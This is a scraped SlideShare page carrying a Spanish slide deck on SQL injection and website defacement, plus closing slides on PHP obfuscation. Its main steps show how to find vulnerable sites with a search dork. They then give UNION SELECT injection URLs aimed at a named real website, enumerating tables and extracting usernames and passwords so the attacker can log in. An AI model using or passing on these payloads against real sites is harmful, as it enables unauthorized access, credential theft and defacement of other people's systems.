SlideShare una empresa de Scribd logo
SQL Injection
¿Que es SQL Injection?Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté incrustado dentro de otro.Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código "invasor" en la base de datos.
¿Que es Deface?El Deface / Defacing / Defacement es la modificación de una página web sin autorización del dueño de la misma.La mayoria de las veces logran defacear un sitio consiguiendo acceso mediante alguna vulnerabilidad que el programador haya dejado en el mismo.También por passwordsdebiles, problemas en el FTP, etc.
Pasos: Buscando website vulnerable.Bueno, ahora vamos a buscar una website vulnerable, para saber si es vulnerable a sqlinjection, en la url tiene que haber algo como; ?id=NUMERO o algo parecido, siempre tiene que haber un "="Para eso buscamos en el explorador: allinurl: "info_page.php?id=*“ para encontrar las websites que tiene esa falla.
Sql injection
Sql injection
Sql injection
Sql injection
se agrega "+from+information_schema.tables--" y se sustituye un valor de los arrojados por table_namese quita el - - y se agrega "+limit+1,1--"jugando con los numeros “2,1”,  ”3,1”,etc para obtener nombres de tablasHasta que encontramos la tabla que contiene el “nombre de usuario”!!Ahora ya tenemos la tabla: USER_PRIVILEGES  lo que haremos ahora es lo siguiente:Borramos information_schema.tables+limit+15,1-- y agregamos lo sig:http://www.mytimeinc.org/info_page.php?id=-1+union+all+select+0,”name”,2,3,4+from+USER_PRIVILEGESAVISO: No siempre es nombre, aveces si no funciona tienes que poner, admin,login,root,adm,administrador,etc.
Ahora como ya sabes el username, borramos lo que hay entre el 0 y el 2.  Y ponemos para obtener la clave:concat(nombre,0x3a3a,pass).http://www.mytimeinc.org/info_page.php?id=-1+union+all+select+concat(nombre,0x3a3a,pass),”name”,concat(nombre,0x3a3a,pass),3,4+from+USER_PRIVILEGESSi no te funciona, cambia donde pone pass[concat(nombre,0x3a3a,pass) por clave,password,contraseña.
OBTENIENDO LA CLAVE!! YA PODEMOS LOGEARNOS
OFUSCAR CODIGO EN PHP:Cuando el desarrollador sustenta su economía a través de la venta de sus productos -diseñados por él o por su empresa-, el que el cliente disponga del código y pueda ofrecerlo a terceros puede ocasionar, entre otras, un aumento del precio final del producto, para evitar los denominados daños colaterales.
¿Cómo evitar esto?La respuesta está en ofuscar el código PHP. A través de la ofuscación del código PHP, el cliente podrá disponer siempre de la aplicación a un precio inferior y el desarrollador estará libre de pesadillas.En el mercado existen varias alternativas para ofuscar código PHP. Una de ellas, y la que más me convence, viene de la mano de ZEND, ZEND GUARD.
Sql injection
Sql injection
Sql injection
Sql injection
Sql injection

Más contenido relacionado

PDF
Eliminando SQL injection
DOCX
Errores que generan los sql con la solucion
PPTX
Los atacantes y sus herramientas
PPTX
Tuto keepass
PPTX
Como borrar archivos temporales
PDF
Millonario tutorial
ODT
Ud06 e04 comandos ms-dos
PPTX
Uso del comando ECHO (Practica 5)
Eliminando SQL injection
Errores que generan los sql con la solucion
Los atacantes y sus herramientas
Tuto keepass
Como borrar archivos temporales
Millonario tutorial
Ud06 e04 comandos ms-dos
Uso del comando ECHO (Practica 5)

Destacado (20)

PPT
πολυτεχνείο 1973
PDF
Omniauth
PDF
Διονύσιος Σολωμός, "Ο Κρητικός". Τα αυτόγραφα του ποιήματος
PPT
20120127 o cvolos-hsa
DOCX
16ο Διεθνές Συνέδριο με θέμα “Οργάνωση & Διοίκηση της Εκπαίδευσης, Διαπολιτισ...
PDF
Eισαγωγή στην PostgreSQL - Χρήση σε επιχειρησιακό περιβάλλον
PPTX
καλό και-κακό-ανά-θρησκείες
ODP
Ad1 educação a distância 2011.2
PPTX
Τσιγάρο; Ευχαριστώ, δεν καπνί-ΖΩ!
PPTX
Οι Μουσώνες
PPT
η ελληνική επανάσταη του 1821 1
PPTX
Dispositivos de entrda y salida con modificaciones 5
PPTX
χριστιανισμός
PPTX
Εμπορικός Σύλλογος Χανίων Σεπτέμβριος 2011
PDF
Book didaktiki pliroforikis
DOCX
τεχνοτροπικές αρχές του δομήνικου θεοτοκόπουλου
DOCX
ο ηλιος ο ηλιατορας
PPTX
Dispositivos de entrada y salida
PPT
Pps εικονικός λόγος
PDF
η ξύση του ήλιου1
πολυτεχνείο 1973
Omniauth
Διονύσιος Σολωμός, "Ο Κρητικός". Τα αυτόγραφα του ποιήματος
20120127 o cvolos-hsa
16ο Διεθνές Συνέδριο με θέμα “Οργάνωση & Διοίκηση της Εκπαίδευσης, Διαπολιτισ...
Eισαγωγή στην PostgreSQL - Χρήση σε επιχειρησιακό περιβάλλον
καλό και-κακό-ανά-θρησκείες
Ad1 educação a distância 2011.2
Τσιγάρο; Ευχαριστώ, δεν καπνί-ΖΩ!
Οι Μουσώνες
η ελληνική επανάσταη του 1821 1
Dispositivos de entrda y salida con modificaciones 5
χριστιανισμός
Εμπορικός Σύλλογος Χανίων Σεπτέμβριος 2011
Book didaktiki pliroforikis
τεχνοτροπικές αρχές του δομήνικου θεοτοκόπουλου
ο ηλιος ο ηλιατορας
Dispositivos de entrada y salida
Pps εικονικός λόγος
η ξύση του ήλιου1
Publicidad

Similar a Sql injection (20)

DOCX
Inyeccion sql by Anonymous - Americalatina
ODP
Seguridad Base de Datos sql injection v1.0
PDF
Introducción a las vulnerabilidades web
PPTX
Inyeccionessqlparaaprendices complemento clase 1
PPTX
Seguridad en bases de datos
PDF
Hacking ético en aplicaciones web [SQL Injection]
PPTX
Inyección sql1
PDF
Inyección_sql
PPT
INYECCION SQL(SEGURIDAD DE LA INFORMACION)
PPTX
Inyecciones SQL para Aprendices
PPT
Ponencia sql avanzado y automatizado
PDF
Ataques a-bases-de-datos
PPT
Inyeccion sql
PPT
Seguridad En Programación
PPTX
Inyecciones sql para aprendices
PDF
Presentación Workshop php Barcelona Seguridad
PPTX
1 sq linjection
PDF
Hack x crack_sq_linjection
DOCX
Articulo ieee ataque_i
PPTX
Mejores prácticas desarrollo de base de datos
Inyeccion sql by Anonymous - Americalatina
Seguridad Base de Datos sql injection v1.0
Introducción a las vulnerabilidades web
Inyeccionessqlparaaprendices complemento clase 1
Seguridad en bases de datos
Hacking ético en aplicaciones web [SQL Injection]
Inyección sql1
Inyección_sql
INYECCION SQL(SEGURIDAD DE LA INFORMACION)
Inyecciones SQL para Aprendices
Ponencia sql avanzado y automatizado
Ataques a-bases-de-datos
Inyeccion sql
Seguridad En Programación
Inyecciones sql para aprendices
Presentación Workshop php Barcelona Seguridad
1 sq linjection
Hack x crack_sq_linjection
Articulo ieee ataque_i
Mejores prácticas desarrollo de base de datos
Publicidad

Último (20)

PPTX
caso clínico iam clinica y semiología l3.pptx
PDF
Metodologías Activas con herramientas IAG
PDF
Gasista de unidades unifuncionales - pagina 23 en adelante.pdf
PDF
Fundamentos_Educacion_a_Distancia_ABC.pdf
PDF
OK OK UNIDAD DE APRENDIZAJE 5TO Y 6TO CORRESPONDIENTE AL MES DE AGOSTO 2025.pdf
PDF
Escuela de Negocios - Robert kiyosaki Ccesa007.pdf
PDF
Unidad de Aprendizaje 5 de Matematica 1ro Secundaria Ccesa007.pdf
PDF
Romper el Circulo de la Creatividad - Colleen Hoover Ccesa007.pdf
PDF
Conecta con la Motivacion - Brian Tracy Ccesa007.pdf
PDF
PFB-MANUAL-PRUEBA-FUNCIONES-BASICAS-pdf.pdf
PDF
Tomo 1 de biologia gratis ultra plusenmas
PDF
COMUNICACION EFECTIVA PARA LA EDUCACION .pdf
PDF
Salvese Quien Pueda - Andres Oppenheimer Ccesa007.pdf
PDF
ACERTIJO Súper Círculo y la clave contra el Malvado Señor de las Formas. Por ...
PDF
Habitos de Ricos - Juan Diego Gomez Ccesa007.pdf
PDF
Cronograma de clases de Práctica Profesional 2 2025 UDE.pdf
PDF
IDH_Guatemala_2.pdfnjjjkeioooe ,l dkdldp ekooe
PDF
TRAUMA_Y_RECUPERACION consecuencias de la violencia JUDITH HERMAN
PDF
Punto Critico - Brian Tracy Ccesa007.pdf
PDF
SESION 12 INMUNIZACIONES - CADENA DE FRÍO- SALUD FAMILIAR - PUEBLOS INDIGENAS...
caso clínico iam clinica y semiología l3.pptx
Metodologías Activas con herramientas IAG
Gasista de unidades unifuncionales - pagina 23 en adelante.pdf
Fundamentos_Educacion_a_Distancia_ABC.pdf
OK OK UNIDAD DE APRENDIZAJE 5TO Y 6TO CORRESPONDIENTE AL MES DE AGOSTO 2025.pdf
Escuela de Negocios - Robert kiyosaki Ccesa007.pdf
Unidad de Aprendizaje 5 de Matematica 1ro Secundaria Ccesa007.pdf
Romper el Circulo de la Creatividad - Colleen Hoover Ccesa007.pdf
Conecta con la Motivacion - Brian Tracy Ccesa007.pdf
PFB-MANUAL-PRUEBA-FUNCIONES-BASICAS-pdf.pdf
Tomo 1 de biologia gratis ultra plusenmas
COMUNICACION EFECTIVA PARA LA EDUCACION .pdf
Salvese Quien Pueda - Andres Oppenheimer Ccesa007.pdf
ACERTIJO Súper Círculo y la clave contra el Malvado Señor de las Formas. Por ...
Habitos de Ricos - Juan Diego Gomez Ccesa007.pdf
Cronograma de clases de Práctica Profesional 2 2025 UDE.pdf
IDH_Guatemala_2.pdfnjjjkeioooe ,l dkdldp ekooe
TRAUMA_Y_RECUPERACION consecuencias de la violencia JUDITH HERMAN
Punto Critico - Brian Tracy Ccesa007.pdf
SESION 12 INMUNIZACIONES - CADENA DE FRÍO- SALUD FAMILIAR - PUEBLOS INDIGENAS...

Sql injection

  • 2. ¿Que es SQL Injection?Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté incrustado dentro de otro.Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código "invasor" en la base de datos.
  • 3. ¿Que es Deface?El Deface / Defacing / Defacement es la modificación de una página web sin autorización del dueño de la misma.La mayoria de las veces logran defacear un sitio consiguiendo acceso mediante alguna vulnerabilidad que el programador haya dejado en el mismo.También por passwordsdebiles, problemas en el FTP, etc.
  • 4. Pasos: Buscando website vulnerable.Bueno, ahora vamos a buscar una website vulnerable, para saber si es vulnerable a sqlinjection, en la url tiene que haber algo como; ?id=NUMERO o algo parecido, siempre tiene que haber un "="Para eso buscamos en el explorador: allinurl: "info_page.php?id=*“ para encontrar las websites que tiene esa falla.
  • 9. se agrega "+from+information_schema.tables--" y se sustituye un valor de los arrojados por table_namese quita el - - y se agrega "+limit+1,1--"jugando con los numeros “2,1”, ”3,1”,etc para obtener nombres de tablasHasta que encontramos la tabla que contiene el “nombre de usuario”!!Ahora ya tenemos la tabla: USER_PRIVILEGES lo que haremos ahora es lo siguiente:Borramos information_schema.tables+limit+15,1-- y agregamos lo sig:http://www.mytimeinc.org/info_page.php?id=-1+union+all+select+0,”name”,2,3,4+from+USER_PRIVILEGESAVISO: No siempre es nombre, aveces si no funciona tienes que poner, admin,login,root,adm,administrador,etc.
  • 10. Ahora como ya sabes el username, borramos lo que hay entre el 0 y el 2. Y ponemos para obtener la clave:concat(nombre,0x3a3a,pass).http://www.mytimeinc.org/info_page.php?id=-1+union+all+select+concat(nombre,0x3a3a,pass),”name”,concat(nombre,0x3a3a,pass),3,4+from+USER_PRIVILEGESSi no te funciona, cambia donde pone pass[concat(nombre,0x3a3a,pass) por clave,password,contraseña.
  • 11. OBTENIENDO LA CLAVE!! YA PODEMOS LOGEARNOS
  • 12. OFUSCAR CODIGO EN PHP:Cuando el desarrollador sustenta su economía a través de la venta de sus productos -diseñados por él o por su empresa-, el que el cliente disponga del código y pueda ofrecerlo a terceros puede ocasionar, entre otras, un aumento del precio final del producto, para evitar los denominados daños colaterales.
  • 13. ¿Cómo evitar esto?La respuesta está en ofuscar el código PHP. A través de la ofuscación del código PHP, el cliente podrá disponer siempre de la aplicación a un precio inferior y el desarrollador estará libre de pesadillas.En el mercado existen varias alternativas para ofuscar código PHP. Una de ellas, y la que más me convence, viene de la mano de ZEND, ZEND GUARD.